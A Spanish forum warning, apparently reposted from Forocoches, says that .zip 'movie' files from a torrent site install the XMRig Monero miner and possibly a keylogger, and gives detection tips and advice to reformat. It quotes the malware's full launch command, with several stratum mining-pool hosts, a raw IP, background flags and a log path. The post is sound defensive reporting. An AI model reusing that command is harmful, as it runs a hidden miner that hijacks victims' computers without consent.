Buenas a todos:
He publicado en Forocoches y por la aceptación lo he traído aquí. Por las prisas y demás lo mismo hay referencias, disculpad si es así, pero lo considero un tema importante por la cantidad de foreros que se han visto afectados, probablemente haya más gente que no lo sepa y esté en las mismas circunstancias.
Aviso para navegantes. Mejor torrent troyaniza tu máquina para usar tu microprocesador para minar bitcoins ( Corregido - Monero ). Y no hablo de scripts de minado para webs que puedas bloquear con noscript o NoCoin.
Normalmente los ficheros que te bajas son nombre_película.torrent, pues bien , ahora han metido ficheros con extensión .zip ( no sé si otras, sólo he visto esta de momento ) y va con un malware que en mi caso ha sido este
Se llama xmrig y sirve para minar bitcoins (monero - corregido ) .
Está relativamente bien diseñado, te ocupa el 100 % de la cpu minando ralentizando tu pc, y cuando abres el administrador de tareas ( Taskmgr.exe ) y el malware ve que esto está corriendo, libera CPU hasta dejarla en niveles normales.
Yo me dí cuenta por un contador de rendimiento que tengo externo, si no como digo te vuelves loco.
Directamente formatee , pero realicé estudios del malware antes.
Apunta contra varios DNS y se lanza de la siguiente manera, utilizando Visual Basic:
vbc.exe -o stratum+tcp://akamai.la:3335 -o stratum+tcp://a40-77-229-13.deploy.static.akamaitechnologies.pw:3335 -o stratum+tcp://obviuslyu.duckdns.org:3335 -o stratum+tcp://minecraftsvr.craftx.biz:3335 -o stratum+tcp://185.185.26.117:3335 -k --donate=1 --background --cpu-priority=0 --no-huge-pages --log-file="C:\Users\Usuario\AppData\Roaming\3a9e8b5a31e1583ec40127043fbe8cf7\miner\hash.txt" --print-time=2
También tiene funciones como las de keylogger ( hijos de puta ) así que ha podido pillar contraseñas.
Si a alguno le va mal el pc, revisad bien vuestros procesos y fijaos con especial atención en los VBC.exe , si le dais a propiedades veréis desde dónde está corriendo ( el path ) y si tiráis un poco más del hilo veréis los logs de ejecución, los dns contra los que apunta, los logs de keyloger...
He investigado un poco la web y tiene sede en Ucrania. Esto debería ser denunciable ( a los GC del foro... ).
He eliminado el malware de mi máquina, pero dejo una captura de virus total donde subo el zip, en este caso la película era Los Elegidos, pero puede ser cualquier peli con extensión .zip .
Si alguno baja este mismo fichero en www.virustotal.com te lo analizan cerca de 60 antivirus, estaría bien que pongáis el hash para saber cuántas muestras de malware tienen. ( si usan más de un virus) Aunque el nombre de fichero sea diferente, el hash no cambia.
¿Cómo puedes saber si estás afectado?
Se sabe que Mejor torrent está usando este tipo de malware, pero no hay que descartar otras fuentes ( emule, archivos de mega...) Para saber si estás afectado, es recomendable mirar el uso de CPU con algo externo a Microsoft, ya que cuando este tipo de malware ve que el administrador de tareas ( Taskmgr.exe ) está corriendo libera el uso de CPU para evitar ser detectado.
Es task Manager deluxe un soft libre
SOLUCIÓN
Hay foreros que comentan que un noscript o un nocoin es suficiente y esto NO ES ASÍ. Estas extensiones de navegador sirven para evitar la ejecución de código no deseado como puede ser coinhive.min.js.
También comentan de usar PiHole, una herramienta que actúa de proxy "baneando" de tu navegación todas aquellas urls que son suceptibles de ser de anunciantes. Básicamente te capa la publicidad a nivel de red y no de aplicación ( como ABP)
El problema aquí no es un script en un navegador, es que han infectado los equipos con malware. Tu máquina está infectada, y sólo con arrancar el sistema operativo arrancará XMRIG o sucedáneos.
Hay shurs que dicen de inhabilitar el proceso, quitarlo del arranque, etc... con todos mis respetos a sus respuestas y conocimientos,creo que esto NO ES SOLUCIÓN.
Si está bien implementado ha podido lanzar mil cosas por detrás que no nos demos cuenta ( como el key logger que no tiene por qué ir en el mismo proceso ) y quitaríamos un fallo, pero tal vez siguiese ejecutándose mierda en nuestros equipos.
La única solución fiable es FORMATEAR, con Windows 10 se hace prácticamente solo, no es como el XP de hace años.